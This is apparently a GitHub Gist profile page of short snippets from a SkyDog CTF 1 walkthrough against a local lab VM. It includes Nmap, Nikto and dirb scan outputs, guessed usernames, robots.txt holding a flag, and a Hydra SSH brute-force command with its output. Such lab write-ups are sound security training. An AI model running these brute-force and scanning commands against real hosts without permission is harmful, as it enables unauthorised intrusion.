Skip to content

Instantly share code, notes, and snippets.

View awesomeaakash's full-sized avatar

awesomeaakash awesomeaakash

View GitHub Profile
@awesomeaakash
awesomeaakash / hydra
Created August 20, 2017 05:09
hydra ssh bruteforce skydog ctf 1
hydra -t 5 -V -f -L usernames.txt -P passwords.txt ssh://192.168.56.131:22
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-19 00:31:59
[DATA] max 5 tasks per 1 server, overall 64 tasks, 812 login tries (l:29/p:28), ~2 tries per task
[DATA] attacking service ssh on port 22
[ERROR] target ssh://192.168.56.131:22/ does not support password authentication.
When i used it then i saw error. I also googled it but failed. So now lets see msfconsole
@awesomeaakash
awesomeaakash / user information
Created August 20, 2017 05:02
user-information -skydog ctf 1
Werner Brandes [which i got from mp3 file]
leroybrown [which i got from flag file]
So we can make possible usernames and passwords for ssh crack ->
werner brandes
werner
brandes
wernerbrandes
@awesomeaakash
awesomeaakash / chaosreader
Created August 20, 2017 04:36
chaosreader - pcap file reader
chaosreader - trace network sessions and export it to html format
DESCRIPTION ->
Chaosreader traces TCP/UDP/others sessions and fetches application data from snoop or tcpdump logs.
This is a type of "any-snarf" program, as it will fetch telnet sessions, FTP files,
HTTP transfers (HTML, GIF, JPEG etc) and SMTP emails from the captured data inside network traffic logs.
A html index file is created to that links to all the session details, including realtime replay programs for telnet, rlogin, IRC, X11 and VNC sessions.
@awesomeaakash
awesomeaakash / chaosreader
Created August 20, 2017 04:36
chaosreader - pcap file reader
chaosreader - trace network sessions and export it to html format
DESCRIPTION ->
Chaosreader traces TCP/UDP/others sessions and fetches application data from snoop or tcpdump logs.
This is a type of "any-snarf" program, as it will fetch telnet sessions, FTP files,
HTTP transfers (HTML, GIF, JPEG etc) and SMTP emails from the captured data inside network traffic logs.
A html index file is created to that links to all the session details, including realtime replay programs for telnet, rlogin, IRC, X11 and VNC sessions.
dirb http://192.168.56.131/ /root/Desktop/wordlists/script_skydog_wordlist_snickers.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Aug 18 22:49:16 2017
URL_BASE: http://192.168.56.131/
WORDLIST_FILES: /root/Desktop/wordlists/script_skydog_wordlist_snickers.txt
@awesomeaakash
awesomeaakash / nikto scan
Created August 19, 2017 13:38
skydog ctf 1 nikto
─[root@vampy]─[~/Desktop]
└──╼ #nikto -h 192.168.56.131
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.131
+ Target Hostname: 192.168.56.131
+ Target Port: 80
+ Start Time: 2017-08-18 21:12:18 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
@awesomeaakash
awesomeaakash / nmap
Created August 19, 2017 13:36
skydog ctf series 1 nmap
Starting Nmap 7.50 ( https://nmap.org ) at 2017-08-18 21:05 IST
Nmap scan report for 192.168.56.131
Host is up (-0.060s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA)
| 2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA)
| 256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA)
@awesomeaakash
awesomeaakash / Setec directory source code
Created August 19, 2017 13:29
skydog ctf series 1 source code of /Setec/ directory
<html>
<img src="./Astronomy/Setec_Astronomy.jpg" width="1024" height="768" alt="" />
<!--
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker_Approved("NSA-Agent-Abbott"; AKA Darth Vader);
@awesomeaakash
awesomeaakash / robots.txt
Created August 19, 2017 13:05
skydog ctf 1 robots.txt file
http://192.168.56.131/robots.txt
# Congrats Mr. Bishop, your getting good - flag{cd4f10fcba234f0e8b2f60a490c306e6}
#
User-agent:*
Disallow: /search
Allow: /search/about
Disallow: /sdch
Disallow: /groups
Disallow: /catalogs